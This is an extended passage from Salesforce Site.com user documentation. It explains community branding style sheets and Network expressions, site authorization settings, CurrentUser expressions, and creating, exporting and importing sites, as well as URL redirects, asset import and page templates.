Site.com Page Templates Overview
Creating Site.com Page Templates

Applying Community Styles from the CommunityBranding
Style Sheet

The CommunityBranding style sheet contains a set of CSS styles created from Network namespace expressions.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

The CommunityBranding style sheet is attached to the Community Template, and is responsible for the template’s
branded look and feel. You can access the styles in the CommunityBranding style sheet and apply them directly to elements
on any page.

To apply community styles using the CommunityBranding style sheet:

1. Make sure the CommunityBranding style sheet is attached to the Site.com page you want to brand. (See Creating and
Using CSS Style Sheets on page 3361.)

Note:  All Site.com pages based on the Community Template automatically have the CommunityBranding
style sheet attached to them.

2. Select the element on the page you want to style.
3. Open the Style pane.
4. Select Class.
5. Start typing “brand”.

A list of all of the available styles in the CommunityBranding styles sheet appears.
6. Select the style you want to apply.

See Also:
Creating Branded Pages Overview
Creating Branded Pages from the Community Template
Viewing the CommunityBranding Style Sheet
Creating and Using CSS Style Sheets

Creating Community Styles in a CSS Style Sheet
Branded Community styles are available in Site.com Community sites through Network namespace expressions.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

You can access a full list of available Network namespace expressions to create new community styles in any CSS style sheet.
When you add an expression to a CSS rule, Site.com “pulls in” the style as it’s defined in the community, and displays it on
your page.

To create community styles in a CSS style sheet:

1. Open an existing style sheet or create a new style sheet. (See Creating and Using CSS Style Sheets on page 3361.)
2. Click Edit Style Sheet Code.
3. Add a new community style rule by using any of the available Network expressions. You can create both ID styles and

class styles. For example:

#main_content_block {
background-color: {!Network.primaryColor};
color: {!Network.primaryComplementColor};

}
.secondary_content_blocks{
background-color: {!Network.zeronaryColor};
color: {!Network.zeronaryComplementColor};

}

4. Apply the new styles to elements on other pages.

Note:  Remember, the style sheet that contains your community styles must be attached to the page containing your
styled elements.

See Also:
Creating Branded Pages Overview
Expressions Available for Community Branding
Creating and Using CSS Style Sheets
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Expressions Available for Community Branding
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

You can use the Network namespace expressions listed on this page to create your own Community styles.

Community branding options, such as headers, footers, and page colors, are set from the Manage Communities page in
Force.com Setup.

Note:

• Empty community headers and footers, or headers that contain only images, won’t work in Site.com. Be sure to
specify customized HTML blocks for your community headers and footers if you’re creating Site.com pages from
the Community Template, or creating community headers and footers using Network namespace expressions.

• Community headers and footers are available as widgets in Site.com community pages. To add a community
header or footer to a blank page, drag it to the page from the Widgets section of the Page Elements pane.

Corresponding Community Branding Page ElementNetwork Expression

Custom content of the community header.{!Network.header}

Custom content of the community footer.{!Network.footer}

The background color for the community header.{!Network.zeronaryColor}

The font color used with zeronaryColor.{!Network.zeronaryComplementColor}

The color used for active tabs in the community.{!Network.primaryColor}

The font color used with primaryColor.{!Network.primaryComplementColor}

The color used for the top border of lists and tables in the
community.

{!Network.secondaryColor}

The background color for section headers on edit and detail
pages in the community.

{!Network.tertiaryColor}

The font color used with tertiaryColor.{!Network.tertiaryComplementColor}

The background color for pages in the community.{!Network.quaternaryColor}

The font color used with quaternaryColor.{!Network.quaternaryComplementColor}

See Also:
Getting Started With Communities
Creating Branded Pages Overview
Creating Community Styles in a CSS Style Sheet
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Viewing the CommunityBranding Style Sheet
The CommunityBranding style sheet contains a set of branded styles from your community.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Community branding options, such as headers, footers, and page colors, are set from the Manage Communities page in
Force.com Setup.

To see the Community styles in the CommunityBranding style sheet, on the Site.com Overview tab, click Style Sheets, and
click the CommunityBranding style sheet. The Community styles are listed on the left. To see the code for the style sheet,
click Edit Style Sheet Code.

A total of fourteen Community class styles are provided. These are the default contents of the style sheet:

.brandZeronaryBgr {
background-color: {!Network.zeronaryColor} !important;
}
.brandZeronaryFgr {
color: {!Network.zeronaryComplementColor} !important;
}
.brandPrimaryBgr {
background-color: {!Network.primaryColor} !important;
}
.brandPrimaryFgr {
color: {!Network.primaryComplementColor} !important;
}
.brandPrimaryBrd2 {
border-color: {!Network.primaryComplementColor} !important;
}
.brandPrimaryFgrBrdTop {
border-top-color: {!Network.primaryComplementColor} !important;
}
.brandPrimaryBrd {
border-top-color: {!Network.primaryColor} !important;
}
.brandSecondaryBrd {
border-color: {!Network.secondaryColor} !important;
}
.brandSecondaryBgr {
background-color: {!Network.secondaryColor} !important;
}
.brandTertiaryFgr {
color: {!Network.tertiaryComplementColor} !important;
}
.brandTertiaryBgr {
background-color: {!Network.tertiaryColor} !important;
color: {!Network.tertiaryComplementColor} !important;
background-image: none !important;
}
.brandTertiaryBrd {
border-top-color: {!Network.tertiaryColor} !important;
}
.brandQuaternaryFgr {
color: {!Network.quaternaryComplementColor} !important;
}
.brandQuaternaryBgr {
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background-color: {!Network.quaternaryColor} !important;
}

See Also:
Getting Started With Communities
Creating Branded Pages Overview
Creating Branded Pages from the Community Template

ADDING AUTHENTICATED PAGES

Site.com Authorization Overview
Available in: Enterprise, Unlimited, and Developer Editions

As part of your site design, you might want to control what content is public and private to your site visitors. New sites are
initially set so that all site resources, such as folders and pages, are public. You can change the default setting from the
Authorization view found under Site Configuration.

The global site authorization options are:

• No Authorization (default)—All resources are public.

• Requires Authorization—All resources are private.

• Custom—All resources are public by default, but can be made private.

The No Authorization and Requires Authorization options let you quickly make your site either all public or all private. But,
if you want to control access to individual pages, folders, and other resources, use the Custom option. Selecting Custom enables

a Requires Authorization checkbox on the Actions menu  for all resources throughout the site. You can define

authorization at the site, folder, page, and individual resource level. As you mark items for authorization, a lock icon  appears
on them. After a resource, like a page, is marked as private, users who aren’t logged into Salesforce are asked to log in when
they try to access it.

Resources can inherit their privacy setting from folders. For example, when a resource, such as a site folder, is marked for
authorization, anything placed in that folder inherits the folder’s authorization setting and becomes private. If you drag that
resource into a public folder, it becomes public again. But, if you explicitly mark a resource as private using the Actions menu,
and then drag it into a public folder, it still remains private because the privacy setting at the resource level dominates.
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When you use the Custom option, an authorization table appears in the Authorization view that lets you manage your private
resources/items marked as private. You can remove authorization from a resource by either deleting it from the authorization
table, or by deselecting the Requires Authorization box on the item itself.

See Also:
Setting Authorization on Your Site
Setting Custom Authorization
Removing Site.com Authorization

Setting Authorization on Your Site
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

You must be an administrative user on the siteTo manage authorization:

User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

As part of your site design, you might want to control what content is public and private to your site visitors. New sites are
initially set so that all site resources, such as folders and pages, are public. You can change the default setting from the
Authorization view found under Site Configuration.

The global site authorization options are:

• No Authorization (default)—All resources are public.
• Requires Authorization—All resources are private.
• Custom—All resources are public by default, but can be made private.

1. Open your site for editing.
2. Click Site Configuration > Authorization.
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3. Select an authorization option.

See Also:
Site.com Authorization Overview
Setting Custom Authorization
Removing Site.com Authorization

Setting Custom Authorization
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

You must be an administrative user on the siteTo manage authorization:

When you select Custom authorization, you get a great deal of flexibility in controlling access to your site. Not only can you
control who has access to top level resources, like folders and pages, but you can also set access at the individual resource level.

Using Custom authorization at the folder level is a great way to make a large number of resources private without having to
mark them individually. Let’s say you periodically run sale offers for your paid users. If you drag all the sale pages into a special
folder you mark for authorization, they instantly inherit the folder’s setting. Users will need to log in to access them. Plus, if
you decide to make one of the sale pages available to everyone, you can simply drag it back into a public folder, or to the root
of the All Site Content area.

1. Open you site for editing.
2. Click Site Configuration > Authorization.
3. Select Custom.
4. Click All Site Content.
5. Create a folder to hold the private pages if it doesn’t already exist.

6. From the folder’s Actions  menu, select Requires Authorization. You’ll see the lock  appear on the folder. It is now
private.

7. Drag any pages you want to make private into the folder. A lock  appears on them too.

Let’s take another example. If you have a page that you’d like to keep private no matter where it resides, you can set its
authorization using the Actions menu. After you set it at the individual resource level, it remains private even if you drag it
into a folder that isn’t set to private. In other words, an resource marked private is always private until you deselect Requires
Authorization on the Actions menu.

If you check the Authorization page, you’ll see all folders and resources marked private are listed in the authorization table
where you can view and delete them.

See Also:
Site.com Authorization Overview
Setting Authorization on Your Site
Removing Site.com Authorization
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Removing Site.com Authorization
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

You must be an administrative user on the siteTo manage authorization:

You can remove authorization for a resource by either deleting it from the authorization table under Site Configuration, or
by deselecting Requires Authorization from the  menu.

1. Open your site for editing.
2. Click Site Configuration > Authorization.
3. From the authorization table, click Delete next to the item you want to remove. Alternatively, navigate to the All Site

Content view. Select the resource. From the Actions  menu, deselect Requires Authorization.

If a resource is explicitly marked as private using the Actions menu, then you must remove authorization from it using the
Actions menu. For example, if a page marked private is dragged into a folder that’s public, it remains private. Likewise, if you
drag it into a folder that’s already private, and remove the authorization on that folder, the page will still be private.

See Also:
Site.com Authorization Overview
Setting Authorization on Your Site
Setting Custom Authorization

DISPLAYING CURRENT COMMUNITY USER INFORMATION IN
SITE.COM

Displaying Current Community User Information
Site.com designers creating authenticated pages for a community site can display the current user’s information by accessing
CurrentUser namespace expressions.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

1. Open the page on which you want to display the current community user's information.
2. From the Page Elements pane, drag a Content Block or Custom Code page element onto the page.
3. Type {!CurrentUser. and the value that you want to display.

For example, {!CurrentUser.firstName}.

Check the list of available expressions for displaying current user information.

4. Add any additional text you require.
For example, Welcome back {!CurrentUser.firstName}!.

5. If you’re in a Content Block, click Save. If you’re in a Custom Code element, click Save and Close.

Note:  If an unauthenticated user views a page that contains CurrentUser expressions, the current user information
does not appear. For example, if an unauthenticated user viewed a page that contained the above example, the user
would see “Welcome back !” as the welcome message.

Expressions Available for Displaying Current User
Information

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Use these CurrentUser namespace expressions to display authenticated user information on a Site.com community page.

DisplaysCurrentUser Expression

Combined first and last name of the user, as displayed on the
user detail page.

{!CurrentUser.name}

First name of the user, as displayed on the user edit page.{!CurrentUser.firstName}

Last name of the user, as displayed on the user edit page.{!CurrentUser.lastName}

Administrative field that defines the user’s login.{!CurrentUser.userName}

Email address of the user.{!CurrentUser.email}

Name used to identify the user in a community.{!CurrentUser.communityNickname}
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Determining the URL of a Site.com Page
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

After you create a Site.com page, you can determine the page’s URL to:

• Provide your users with a URL that lets them access a public page directly.
• Create a link to the page from other pages, including Force.com Sites and Visualforce pages.
• Make it the home page for your community using a URL redirect in Force.com Sites.
• Add a private page to a tab in your community.

1. To determine the correct URL for the page:

• From the Create Community wizard, click Customize.
• If you navigated away from the Create Community wizard, click Customize > Communities > Manage Communities,

then click Edit next to the community name.

2. Copy the URL on the Getting Started screen and paste it into a text editor.
3. To create a URL that points to:

• The Site.com site’s home page, append /s/ to the URL. For example,
https://mydomain.force.com/mycommunity/s/.

• A specific Site.com page, append /s/<page_name>, where <page_name> is the name of the Site.com page. For
example, https://mydomain.force.com/mycommunity/s/promotion.

The URL is case-sensitive and “s” must be lowercase.

See Also:
Adding Authenticated Site.com Pages to Community Tabs
Force.com Sites URL Redirects
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Adding Authenticated Site.com Pages to Community Tabs
After you create a private Site.com page, you can add the page to a tab in your community.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”

OR

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage a community’s custom pages:

In this case, you need to create a Web tab that points to your Site.com page.

1. Determine the correct URL for the page.
2. From Setup, click Create > Tabs.
3. In Web Tabs, click New and on the Step 3 screen, paste the URL you created in the Button or Link URL text box.
4. Return to the Create Community wizard and add the new tab to your community.

To preview the private page in your community, you must publish your Site.com site.

See Also:
Salesforce Communities Overview
Creating Web Tabs
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CREATING AND MANAGING SITES

Creating a Site.com Site
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

To create or import Site.com sites:

To get started with Site.com, create a new blank site:

1. On the Site.com tab in the Site.com app, click New. Alternatively, in Site.com Studio, click Create a New Site in the
site's drop-down menu.

2. Click Create a Blank Website.
3. Enter the site name.
4. Click Create. Your new website opens in Site.com Studio, where you can create page templates and site pages, and add

functionality to it.

Note: You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Creating Site.com Page Templates
Creating Site.com Pages
Understanding the Page Editing View in Site.com Studio
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Deleting a Site.com Site
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

You can delete any site that isn’t published. If the site is published, you must first unpublish it before you can delete it. See
Taking a Site Offline on page 3429.

1. On the Site.com tab in the Site.com app, select the site and click  > Delete.
2. Click OK.

Note: You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Exporting a Site.com Site

Duplicating a Site.com Site
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

To create a copy of a site:
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1. On the Site.com tab in the Site.com app, select the site and click  > Duplicate. Alternatively, in Site.com Studio, click
the Site Actions drop-down menu and select Duplicate This Site.

2. Enter a name for the site.
3. Click Create.

Note:

• If you’re creating a copy of a site that uses data services, you must set the data access permissions in the new site’s
guest user profile.

• You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Creating a Site.com Site
Exporting a Site.com Site
Importing a Site.com Site

Exporting a Site.com Site
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

You can export your site from Site.com to your hard drive. The site is exported in a packaged format with a .site extension,
which you can import into another Salesforce organization. The maximum site size you can import is 200 MB.

1. On the Site.com tab in the Site.com app, select the site and click  > Export.
2. If the site is:

• Smaller than 100 MB, select a location to save the exported .site file on your hard drive and click Save.
• Larger than 100 MB, you’ll receive an email when the export process has completed. Click the link in the email to

download the exported .site file.

Note:

• Exporting a site doesn’t remove it from the current organization.
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• You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Creating a Site.com Site
Importing a Site.com Site

Importing a Site.com Site
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

To create or import Site.com sites:

You can import an exported Site.com site into your organization. The maximum site size you can import is 200 MB. When
you import a site, you are given the site administrator role in the site.

1. On the Site.com tab in the Site.com app, click New. Alternatively, in Site.com Studio, click Create a New Site in the
site's drop-down menu.

2. Select Import a Site or Template.
3. Enter the site name.
4. Click Browse to locate the exported site on your hard drive. Exported sites have a .site extension.
5. Click Create.

Note:

• If you’re importing a site that uses data services, you must set the data access permissions in the imported site’s
guest user profile. Additionally, any data repeaters, data tables, data functions, or forms may need to be reconfigured.

• You can’t create, delete, duplicate, export, or import community sites in Site.com.

See Also:
Creating a Site.com Site
Exporting a Site.com Site
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Configuring Site Properties
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Set properties for the site, such as the home page, site name, and error page, and create an anonymous preview URL that
allows other users to review the site before it goes live. The URL is always valid (unless you disable it) and shows the latest
work in progress. It’s only available to the people you send it to, and can’t be found by search engines.

1. On the Overview tab, click Site Configuration.
2. Click Edit.
3. In the Site Configuration view, you can:

• Replace the name in the Site Name field to rename the site.
• Select Enable Anonymous Preview to create a URL that allows other users to preview the site before it goes live.

(Click the View Anonymous Preview option that appears in the Preview menu to access the preview URL, which you
can copy and send to other users to review and test your changes.) Enable Anonymous Preview is also available from
the Preview menu on the Overview tab.

• Access the site’s guest user profile.
• Select the home page for your website in the Home Page drop-down list.
• Select a user-friendly error page (if you created one) in the 404 Page drop-down list to display when a page can't be

found. It's a good idea to create a user-friendly error page to assist site visitors if they encounter a broken link.

4. Click Save.

Note:

• The home page and 404 page you specify for Site.com Community sites in Site Configuration set the home and
404 pages for the Site.com Community site only. Community home pages are set in the Tabs section of the Create
Community wizard. Community error pages are specified in Force.com Setup, under Pages.

• When your Site.com Community site is offline, users are redirected to the Page Not Found page defined in
Force.com Setup, under Pages.

See Also:
Creating a Site.com Site
Using Site.com Studio as a Site Administrator or Designer
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Creating URL Redirects in Site.com
If you move or reorganize pages in your site, search engines may have trouble finding the new page locations. To avoid this,
set up URL redirects to inform users and search engines that site content has moved.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

You can use URL redirects to:

• Maintain search engine ranking. For example, if you change a page’s name from “Gadgets” to “Widgets,” creating a redirect
rule from /Gadgets to /Widgets lets you restructure the site without affecting your page ranking.

• Make URLs more readable and memorable. For example, site visitors will find long or numeric page names, such as
/widget65AD890004ab9923, difficult to remember. Instead, you can provide them with a short, friendly URL, such
as /widget, and create an alias that redirects to the correct page when the user uses the short URL alias.

• Assist with migration from another system to Site.com if you’re still using the same domain. For example, if your old site
ran on PHP, you can create a redirection rule from an old page, such as /index.php, to a new page in Site.com, such as
/myNewPage.

To assign a redirect to a site page:

1. On the Overview tab, click Site Configuration > URL Redirects.
2. Click Create a Redirect.
3. Specify the Redirect type:

DescriptionOption

Select this option if you want users and search engines to
update the URL in their systems when visiting the page.

Permanent (301)

Users visiting a page redirected with this type are sent
seamlessly to the new page. Using a permanent redirect
ensures that your URLs retain their search engine popularity
ratings, and that search engines index the new page and
remove the obsolete source URL from their indexes.

Select this option if you want users and search engines to
keep using the original URL for the page. Search engines

Temporary (302)

interpret a 302 redirect as one that could change again at
any time, and though they index and serve up the content
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DescriptionOption

on the new target page, they also keep the source URL in
their indexes.

Select this option if you don’t want the URL to change in
the user’s browser, but you want to redirect to a different

Alias

page. Search engines won’t be aware of the change or update
their records.

Alias redirects only work when you redirect from one
Site.com page to another. You can’t create an alias to an
external address.

4. Specify the former page location in the Redirect from field.

• The page location must be a relative URL.
• The page can have any valid extension type, such as .html or .php, and can contain parameters. Parameter order is

irrelevant.
• The URL can’t contain anchors, such as /siteprefix/page.html#target.
• You can create just one redirection rule from a particular URL. If you create a new rule with the same Redirect From

information, the old rule is overwritten.

5. Specify the new page location in the Redirect to field. This can be a relative URL or a fully-qualified URL with an
http:// or https:// prefix. Unlike pages you’re redirecting from, pages you’re redirecting to can contain anchors.

6. To immediately enable the redirection rule, ensure Active is selected. To enable it at a later stage, deselect the property.
7. Click Save.

The URL Redirects section displays all URL redirection rules you've created for your site.

• Edit an assigned redirect rule by clicking  > Edit Redirect.
• Delete a redirect rule by clicking  > Delete Redirect.

Creating and Managing Folders
As a site administrator or designer, you can create folders to manage your pages, style sheets, templates, and assets.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:
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To create new folders:

1. In the All Site Content view on the Overview tab, click New Folder.
2. Type in the folder name.
3. Click Create.

Folders are created at the top level of the folder tree. Once created, you can drag them anywhere in the tree structure. Likewise,
you can drag and drop files into the folders you create. To rename, delete, and create sub-folders, right-click the folder or use
the Actions menu ( ).

Note:  The site map remains the same regardless of how you arrange folders in the All Site Content view.

See Also:
Understanding the Site Administrator and Designer's Overview Tab

Importing and Managing Assets
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can import a variety of assets, such as images and PDFs, to use in a website.

Note:

• To import folders of assets and maintain the folder structure in your site, first create a .zip file of the content, and
then import and unzip the content.

• The maximum file size you can import is 50 MB unless you import and unzip a .zip file. In that case, you can
import a .zip file of up to 200 MB if you select Unzip files during the import process.

The quickest way to import one or more files is to:
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1. Select the files and drag them directly onto the Studio interface. This is supported for Mozilla® Firefox® and Google®

Chrome only.
2. Depending on the types of files you’re importing, a dialog box may appear that lets you:

• Select Unzip files to extract the contents of a .zip file. If the .zip file includes folders, this structure is maintained in
your site.

• Select Overwrite existing files to replace a file that already exists in the site.
• Select Convert CSS files into style sheets, if you're a site administrator or designer, to convert a CSS file into a style

sheet that you can use to style your website.

Alternatively, to import a single file:

1. Click Import....
2. Click Browse... to locate the file.
3. Select the file and click Open.
4. Depending on the type of file you’re importing, you can:

• Select Unzip files to extract the contents of a .zip file. If the .zip file includes folders, this structure is maintained in
your site.

• Select Overwrite existing files to replace a file that already exists in the site.
• Select Convert CSS files into style sheets, if you're a site administrator or designer, to convert a CSS file into a style

sheet that you can use to style your website.

5. Click Import. A message appears indicating whether the file was imported successfully.

6. Click .

You can add images and videos to the text areas of your site pages, or create a hyperlink to any imported asset. If you're a site
administrator or designer, you can add also add images directly to the page.

View the list of imported assets in the Assets view on the Overview tab. You can also access assets in the All Site Content
view, which displays the folder hierarchy of your site.

• To view a thumbnail of an imported image, hover over it.

• To save an asset to your computer, hover over or select it and click  > Download.
• To remove an asset from your site if you're a site administrator or designer, hover over or select it and click  > Delete.

If the asset is being used in your site, you see a confirmation message with a list of locations where that asset is in use.

See Also:
Adding Site.com Page Elements
Using Site.com Studio as a Site Administrator or Designer
Using Site.com Studio as a Contributor
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CREATING AND MANAGING PAGES

Understanding the Page Editing View in Site.com Studio
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When working with page templates and site pages, you can add content, structure, and style, all in one place. Open a page or
template on the Overview tab by double-clicking it or hovering over it and clicking  > Edit. The page opens as a new tab.

• Using the Page Elements and Page Structure panes (1), you can add page elements to a page and reorder the page
element hierarchy.

•
Using the Properties, Style, and Events panes (2), you can set properties, add style, and create events for a
selected page or element.
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• Using the toolbar (3), you can:

◊ Edit page text.

◊ Undo and redo your actions.

◊ Cut, copy, or paste page elements.

◊ Import assets, such as images and files.

◊ Preview your site or generate an anonymous preview link to send to other users.

◊ Publish your recent changes.

◊ Access other page actions, such as renaming or deleting the page.

• On the page canvas (4), you can lay out the page and select, edit, and move page elements.

Tip:

•

Hide the side panes to increase the canvas size by clicking  and . To reopen a pane, click its icon.
• As you edit a page, your changes are saved and the status icon ( ) on the page tab is updated automatically.
• If the site page or page template is based on another template, editable page elements are highlighted with a blue

border on the page.

See Also:
Using Site.com Studio as a Site Administrator or Designer

Site.com Page Templates Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Before you begin building the pages of your website, take some time to plan the pages you need, and in particular, which pages
will have a similar layout. Once you've decided on the layout, the quickest method is to use a page template to build the basic
layout.

About Page Templates

A page template lets you define the layout and functionality of site pages in one location. By adding common page elements
to the template and then basing site pages on it, you can achieve a consistent look and feel throughout your site. Page templates
don't appear on your public site.

As the template creator, you specify which elements users can edit in pages based on the template. By default, a page element
in a template is “locked,” so users can't edit its contents in any template-based page unless you mark the page element as
“editable.” Conversely, when users edit an editable page element in a template-based page, their changes are specific to that
page and don't affect your template.
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For example, this main page template contains a non-editable header and navigation menu that are common to all the pages
in the site (1). The main template also has an editable center panel (2) to house the page-specific content of each page that's
based on it.

Note:

• Page templates must contain at least one editable page element. Otherwise, users can't edit site pages that are
based on the template.

• Panels are ideal for adding editable areas to page templates.

You can use page templates to:

• Save time and effort by laying out the page structure and using it as a starting point when you create site pages. For example,
you could design a template with a fixed header panel and side menu, and an editable center panel, to which you add
page-specific page elements and content.

• Quickly make global updates to the layout or style of your website, as any changes you make to the template's design are
reflected immediately in all the pages that use it.

• Control how other users (such as contributors or other site administrators and designers) can modify site pages. For example,
you may allow contributors to edit specific content blocks only.

• Ensure your template design remains pixel-perfect. When users edit a page that's based on a template, their changes don't
affect your template.

• Reuse common design elements by creating child templates.
• Allow contributors to create site pages that are based on the template.

About Child Templates

Child templates are a useful way to reuse common design elements for more complicated page layouts. For example, your
website will probably have elements that are the same on every page in your site, such as a navigation menu. However, several
pages may have elements that are common only to them, such as pages in a subsection of your site that include a subsection
header. By using a child template, which is a template that's based on another template, you can reuse the main template
design.

Using our main page template as a base, the child template inherits the non-editable header and navigation menu (1), and an
editable center panel (2) where we add the non-editable subsection header (3). We also need to add a new editable center
panel (4) because the center panel of the main template is editable only in pages directly based on the main template.
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Now, any page based on the child template includes the non-editable main header, navigation menu, and subsection header,
and an editable center panel (5) for that page's content.

Best Practices

• Plan your site structure and the layout of your pages. Taking the time to plan your website first saves time when you build
your site.

• Identify which elements are common to all the pages of your site, such as navigation menus or headers, as these are the
elements you can add to the page template.

• Use page templates wherever possible to promote content reuse and save time.
• Try to keep the design of your main page template as simple as possible to make it easier to modify in the future. For more

complicated site designs, use child templates to achieve maximum flexibility.

See Also:
Creating Site.com Page Templates
Creating Site.com Pages
Identifying Which Template a Site.com Page Uses
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Creating Site.com Page Templates
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A page template lets you define the layout and functionality of site pages in one location. By adding common page elements
to the template and then basing site pages on it, you can achieve a consistent look and feel throughout your site. And because
a template-based page inherits the template's elements, you can make site-wide changes from one location.

You can create a page template from a layout, or if you've already created a template, you can use it as a base to create a child
template, which lets you reuse the design of the main template.

Creating a Page Template from a Layout

To start from scratch with a completely blank template or use a basic page layout:

1. Hover over Page Templates on the Overview tab and click New, or click New Page Template in the Page Templates
view.

2. Enter the page template name. Template names can’t include special characters, such as #, ?, or @.
3. Click Layouts and select either a blank page or a predefined page layout, such as a page with a header and footer.

Note:  Predefined page layouts use panels to create columns, headers, and footers. These panels use inline CSS
to set their position, so you can easily modify the layout after the page is created. However, if you're familiar with
CSS and prefer using CSS rules, you can remove the inline style by selecting the panel, deleting the code from
the Code tab in the Style pane, and clicking Apply.

4. Choose a layout mode:

• To expand the page to fill the width of the browser window, click Full width.
• To set the page width, click Fixed width and enter the width.

5. Click Create. The page template opens.

Next, you must complete the template.

Tip:

• By default, any template you create is only available to other site administrators and designers in your organization.
To let contributors create pages based on the template, select Available to Contributor in the Properties pane.

• You can also create templates by converting or duplicating other pages.
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Creating a Child Template

To use an existing template as a base for a child template:

• The quickest option is to:

1. Select the template in the Page Templates view on the Overview tab and click  > Create Child Template.
Alternatively, click Page Actions > Create Child Template if the template is open.

2. Enter the page template name. Template names can’t include special characters, such as #, ?, or @.
3. Click Create. The child template opens.

• Alternatively:

1. Hover over Page Templates on the Overview tab and click New, or click New Page Template in the Page Templates
view.

2. Enter the page template name. Template names can’t include special characters, such as #, ?, or @.
3. Click Page templates and select the page template.
4. Click Create. The child page template opens.

Completing Your Template

Once you've created a template, you must take the next steps to complete it:

• Lay out the page template
• Add other page elements to the template
• Create editable areas
• Create template-based site pages

See Also:
Creating Editable Template Areas
Identifying Which Template a Site.com Page Uses
Site.com Page Templates Overview
Understanding the Page Editing View in Site.com Studio

Creating Editable Template Areas
As the template creator, you specify which elements users can edit in pages based on the template.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:
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To make a page element editable in derived pages or child templates, select it on the page template or in the Page Structure
pane and click  > Make Editable, or select Editable in the Properties pane.

When the page template is open, editable page elements are highlighted with a blue border on the page. They also display a

pencil icon ( ) in the Page Structure pane and in the information popup that appears when you hover over the element on
the page.

See Also:
Tips for Working With Editable Page Elements
Working With Default Content in Editable Page Elements
Creating Site.com Page Templates

Tips for Working With Editable Page Elements
When you mark a page element as Editable on a page template, that page element becomes editable in any child pages or
templates derived from the parent template.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Consider these tips when creating editable page elements. If you’re working with editable page elements that contain default
content, see Working With Default Content in Editable Page Elements on page 3327.

• Editable page elements are highlighted with a blue border in child pages and templates.

• If you make a page element within a panel editable, you can’t also make the panel editable.

• Deleting an editable element from a page template removes it from all child pages and templates.

• When you enable the Editable property of a page element, any pages or child templates based on the template also
inherit the enabled status. In turn, the enabled status in the child template cascades to any of its children, and so on. If you
don’t want its editability to cascade to any lower levels, disable the Editable property of a page element in a child template.

• Users can't alter the events, style, or properties of an editable page element in pages based on the template.

• Users can't resize, reposition, or delete editable page elements in pages based on the template. However, if the element's
Auto Height property is enabled in the template, its height will adjust to fit the content of the template-based page.

